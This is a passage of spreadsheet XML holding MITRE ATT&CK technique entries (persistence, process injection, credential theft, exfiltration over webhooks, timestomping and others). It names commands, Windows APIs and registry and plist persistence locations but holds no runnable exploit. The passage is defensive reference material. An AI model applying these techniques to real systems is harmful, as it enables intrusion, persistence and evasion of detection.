Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.
https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>T1098.007</t>
  </si>
  <si>
    <t>Additional Local or Domain Groups</t>
  </si>
  <si>
    <t>An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.
On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)
For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges. 
In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)
https://attack.mitre.org/techniques/T1098/007</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Upload Malware</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)
https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in &lt;code&gt;klist&lt;/code&gt; utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.
https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.
Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)
https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)
Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.
https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)),  or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)
https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) 
Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>Clear Mailbox Data</t>
  </si>
  <si>
    <t>Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. 
Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called &lt;code&gt;mail&lt;/code&gt;  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)
Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)
https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Login Hook</t>
  </si>
  <si>
    <t>Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; file and can be modified using the &lt;code&gt;defaults&lt;/code&gt; command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
Adversaries can add or insert a path to a malicious script in the &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt; file, using the &lt;code&gt;LoginHook&lt;/code&gt; or &lt;code&gt;LogoutHook&lt;/code&gt; key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)
Adversaries may inject content to victim systems in various ways, including:
* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)
Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)
https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>T1567.004</t>
  </si>
  <si>
    <t>Exfiltration Over Webhook</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. 
Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)
https://attack.mitre.org/techniques/T1567/004</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>T1021.008</t>
  </si>
  <si>
    <t>Direct Cloud VM Connections</t>
  </si>
  <si>
    <t>Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).
Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. 
Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).
https://attack.mitre.org/techniques/T1021/008</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as &lt;code&gt;split&lt;/code&gt; to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>T1557.004</t>
  </si>
  <si>
    <t>Evil Twin</t>
  </si>
  <si>
